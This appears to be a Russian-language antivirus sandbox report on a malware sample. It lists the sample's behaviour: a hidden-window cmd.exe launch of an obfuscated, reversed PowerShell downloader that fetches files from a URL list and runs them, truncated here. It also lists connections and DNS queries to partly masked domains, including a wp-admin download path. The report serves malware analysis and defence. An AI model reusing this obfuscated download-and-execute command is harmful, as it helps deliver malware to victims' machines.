Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:ON/C"^set ^4^lC^q= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}^{^hc^t^ac}^;^k^aerb^;RN^i^$ ^metI-^ek^ovnI;)RNi$^ ,wOz$(^e^l^i^FdaolnwoD^.^a^jR$^{yr^t{)S^i^Y^$^ ni w^Oz$(hc^aer^o^f;'^ex^e^.^'+^jwt^$^+'\'...
Сетевая активность
Подключается к
- 'bt##h.net':80
- 'ba####adyplans.com':80
- 'ba####adyplans.com':443
TCP
Запросы HTTP GET
- http://bt##h.net/dgwH59i
- http://ba####adyplans.com/wp-admin/Sx8sOI4zO
Другие
- 'ba####adyplans.com':443
UDP
- DNS ASK bt##h.net
- DNS ASK co####urperu.com
- DNS ASK ba####adyplans.com
- DNS ASK sh##h1.uz
- DNS ASK gu########ls.todaycouponcode.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:ON/C"^set ^4^lC^q= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}^{^hc^t^ac}^;^k^aerb^;RN^i^$ ^metI-^ek^ovnI;)RNi$^ ,wOz$(^e^l^i^FdaolnwoD^.^a^jR$^{yr^t{)S^i^Y^$^ ni w^Oz$(hc^aer^o^f;'^ex^e^.^'+^jwt^$^+'\'...' (со скрытым окном)
